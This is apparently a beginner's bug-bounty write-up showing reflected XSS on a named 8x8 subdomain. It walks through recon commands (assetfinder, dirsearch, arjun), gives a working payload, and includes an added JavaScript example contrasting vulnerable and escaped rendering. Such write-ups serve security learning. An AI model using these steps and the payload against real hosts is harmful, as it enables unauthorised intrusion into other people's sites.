Get Reflected XSS within 3 minutes

Gökhan Güzelkokar
Feb 12 · 2 min read

Hi guys. I found XSS on 8x8 within 3 minutes and I want to share it step by step. I am writing these write-ups for beginners like me. I think I will learn more as I write, and I love it.

STEP 1 — Subdomain Enumeration

%.%.%.%.%.8x8.com

Descend as deep as you can. You can use any tool for enumeration, such as assetfinder, sublist3r or subfinder. I use assetfinder with httprobe.

assetfinder -subs-only | httprobe

A subdomain wandering alone :)

Here is our target: client-beta.global.chalet.8x8.com

STEP 2 — Directory discovery

You can use filebuster, dirsearch or gobuster. I use dirsearch.

dirsearch.py -u "client-beta.global.chalet.8x8.com" -e html,json

STEP 3 — Hidden parameters are gold

🔥 :bad_params!! Let’s use arjun to find hidden parameters.

Now we have a GET parameter on the blank page. 👌 Let’s try to get XSS!

Payload: "><img onerror=alert(1) src>
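Why a payload of this shape fires, and what the fix looks like, as an added example (not code from this write-up or from 8x8). It assumes the parameter is reflected into a double-quoted HTML attribute, which the leading `">` suggests; the parameter name `q` and the markup are hypothetical.

```javascript
// Encode the characters that are significant in HTML text and quoted attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[ch]));
}

// Vulnerable form: the raw query value is concatenated into the attribute.
function renderVulnerable(query) {
  const q = query.get('q') || '';
  return '<input type="hidden" name="q" value="' + q + '">';
}

// Hardened form: the same template with output encoding at the point of use.
function renderHardened(query) {
  const q = query.get('q') || '';
  return '<input type="hidden" name="q" value="' + escapeHtml(q) + '">';
}

// Crude count of element start tags, enough to show whether the reflected
// value stayed inside its attribute or created a new element.
function countTags(html) {
  return (html.match(/<[a-zA-Z][^>]*>/g) || []).length;
}

// Constructed request using the payload quoted in the write-up.
const PAYLOAD = '"><img onerror=alert(1) src>';

function demo() {
  const query = new URLSearchParams({ q: PAYLOAD });
  const vulnerable = renderVulnerable(query);
  const hardened = renderHardened(query);
  return {
    vulnerable,
    hardened,
    vulnerableTags: countTags(vulnerable), // input + injected img
    hardenedTags: countTags(hardened),     // input only
  };
}

console.log(demo());
```

In the vulnerable output the `">` closes the `value` attribute and the `input` tag, so the browser parses the `img` as a new element; in the hardened output the same bytes remain attribute data.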

Thank you !!!

Gökhan Güzelkokar

Written by

ISTE https://twitter.com/gkhck_ https://m.youtube.com/channel/UCF75UK6iUcHxUdC8OMw7w4A
